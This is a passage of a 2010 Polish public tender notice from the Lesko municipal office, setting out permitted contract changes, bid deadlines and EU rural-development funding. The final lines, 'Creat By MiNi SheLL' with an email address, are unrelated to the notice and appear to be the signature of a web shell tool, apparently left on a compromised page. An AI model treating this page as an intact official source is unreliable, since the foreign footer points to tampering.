a)	w przypadku wystąpienia okoliczności niezależnych od Wykonawcy na uzasadniony wniosek Wykonawcy, pod warunkiem, że zmiana ta wynika z okoliczności, których Wykonawca nie mógł przewidzieć na etapie składania oferty i nie jest przez niego zawiniona, 
b)	w przypadku opóźnienia Zamawiającego w rozstrzygnięciu przetargu oraz opóźnienia Zamawiającego w podpisaniu umowy,
c)	w przypadku opóźnienia Zamawiającego w przekazaniu placu budowy,
d)	w przypadku braków lub wad dokumentacji projektowej lub innych dokumentów budowy (np. pozwolenia na budowę), o ile Zamawiający zobowiązany jest do przekazania takich dokumentów Wykonawcy,
e)	opóźnień Zamawiającego w zakresie dokonywania odbiorów lub prób końcowych,
f)	w przypadku zawieszenia robót przez Zamawiającego,
g)	wyjątkowo niesprzyjających warunków atmosferycznych uniemożliwiających realizację robót,
h)	wykopalisk lub innych przeszkód uniemożliwiających prowadzenie robót, za które nie odpowiada Wykonawca,
i)	zmian w dokumentacji projektowej o czas niezbędny do dostosowania się Wykonawcy do takiej zmiany.
Wynagrodzenie Wykonawcy określone w umowie może ulec zmianom w następujących przypadkach:
a)	zmiana stawki urzędowej podatku VAT,
b)	rezygnacji z części robót, jeśli taka rezygnacja będzie niezbędna do prawidłowej realizacji przedmiotu umowy lub których wykonanie nie będzie konieczne, lub będzie bezcelowe w przypadku zaistnienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy - o wartość niewykonanych robót.
c)	rezygnacji z części robót, jeśli taka rezygnacja będzie niezbędna do prawidłowej realizacji przedmiotu umowy - o wartość niewykonanych robót.
Inne zmiany:
a)	w zakresie kluczowego personelu Wykonawcy lub Zamawiającego, za uprzednią zgodą Zamawiającego wyrażoną na piśmie, akceptującą kandydata na kluczowe stanowisko kierownicze,
b)	w zakresie podwykonawstwa, za uprzednią zgodą Zamawiającego:
- powierzenie podwykonawcom innej części robót niż wskazana w ofercie Wykonawcy,
- zmiana podwykonawcy na etapie realizacji robót, o ile nie sprzeciwia się to postanowieniom SIWZ,
c)	w zakresie kolejności i terminów wykonywania robót wskazanych w SIWZ,
d)	w przypadku aktualizacji rozwiązań z uwagi na postęp techniczny lub zmiany obowiązujących przepisów techniczno-budowlanych.
Warunki zmian:
a)	inicjowanie zmian - na wniosek Wykonawcy lub Zamawiającego,
b)	uzasadnienie zmian - prawidłowa realizacja przedmiotu umowy, obniżenie kosztów, zapewnienie optymalnych parametrów technicznych i jakościowych robót,
c)	forma zmian - aneks do umowy w formie pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.lesko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy Lesko, ul. Parkowa 1, 38-600 Lesko, pokój 201 (II piętro).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.08.2010 godzina 10:00, miejsce: Urząd Miasta i Gminy Lesko, ul. Parkowa 1, sekretariat Urzędu pokój nr 106 (I piętro)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie finansowane z środków własnych Gminy Lesko oraz środków Europejskiego Funduszu Rolnego na rzecz Rozwoju Obszarów Wiejskich w ramach Programu Rozwoju Obszarów Wiejskich 2007-2013, działanie 321 Podstawowe usługi dla gospodarki i ludności wiejskiej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com